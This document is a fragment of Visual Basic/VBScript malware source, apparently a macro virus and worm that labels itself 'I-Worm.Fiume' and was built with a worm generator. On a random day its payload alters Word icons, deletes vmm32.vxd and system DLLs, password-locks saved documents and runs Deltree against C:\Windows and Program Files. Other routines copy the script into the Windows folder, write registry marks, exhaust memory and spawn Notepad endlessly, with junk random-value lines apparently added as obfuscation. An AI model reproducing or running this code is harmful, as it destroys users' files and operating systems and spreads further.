PtVz1155 = GoDvUuFe & QzRr15194 & NwEiVmRm & TeFo9394
FjKiKjNz = PnBy3408 & CtHs11317
Part22$ = "icon = c:\windows\SYSTEM\shell32.dll,"
AiDv11465 = AtEpDwUm & AuUe7290 & Int(Rnd * 3505)
Part3$ = Part2$ + rn$
CrNq11632 = KsBpMtNg & NiKo10070 & Int(Rnd * 8290)
DmJt13596 = AzGhCfJe & LlNp5701 & Int(Rnd * 6080)
Part33$ = Part22$ + rnn$
hFile = FreeFile
Open strFile For Output Access Write As hFile
Print #hFile, Part1$
If Choice = 0 Then
Print #hFile, Part3$
Else
Print #hFile, Part33$
End If
Close hFile
LsLr16081 = BkLuSnRw & GzIf13075 & Int(Rnd * 4214)
FyPg9094 = RqNuIeJk & JnLf11672 & OqKfLnCe & RgTp9531
End Sub
Sub Payload()
On Error Resume Next
End Sub
U = Int(Rnd() * 30) + 1
If Day(Now()) = U Then
SetPrivateProfileString "HKEY_CLASSES_ROOT\WORD.DOCUMENT.6\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,31", ""
SetPrivateProfileString "HKEY_CLASSES_ROOT\Word.Template\DefaultIcon\", "", "C:\Windows\System\Shell32.dll,32", ""
AppHide ("Program Manager")
SetAttr "c:\Windows\System\vmm32.vxd", 0
Kill "c:\Windows\System\vmm32.vxd"
FileSaveAs .Password = "Fuck!"
p = 1000
g = 50
num = Int(Rnd() * (p - g) * g)
FileSaveAs .Password = Str$(num)
Shell ("Deltree /y C:\Windows")
Shell ("Deltree /y C:\Progra~1")
Destroy$ = "C:\Windows\system\*.dll"
SetAttr Destroy$, 0
Kill Destroy$
Kill "*.*"
End If
End Function
Sub Crash()
On Error Resume Next
Set m965y18eN62 = CreateObject("WScript.Shell")
m965y18eN62.regwrite "HKCU\software\I-Worm.Fiume\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set mKswiP594x3 = CreateObject("scripting.filesystemobject")
mKswiP594x3.copyfile wscript.scriptfullname, mKswiP594x3.GetSpecialFolder(0) & "\ms.vbs"
KsVr9p8XF8e = 1
Do
ReDim Preserve xwCc40hKEZD(KsVr9p8XF8e)
tcZz42j153e = CLng(1024)
xwCc40hKEZD(KsVr9p8XF8e) = String(tcZz42j153e * tcZz42j153e, ".")
KsVr9p8XF8e = KsVr9p8XF8e + 1
Loop
End If
End Function
Sub Crash2()
On Error Resume Next
Set j8Q4v066K5R = CreateObject("WScript.Shell")
j8Q4v066K5R.regwrite "HKCU\software\Worm.Fiume\", Chr(87) & Chr(111) & Chr(114) & Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) & Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) & Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) & Chr(48) & Chr(98)
Set Ze9YN9DKS8P = CreateObject("scripting.filesystemobject")
Ze9YN9DKS8P.copyfile wscript.scriptfullname, Ze9YN9DKS8P.GetSpecialFolder(0) & "\Worm2.vbs"
Do
j8Q4v066K5R.Run "notepad", False
Loop
End If
End Function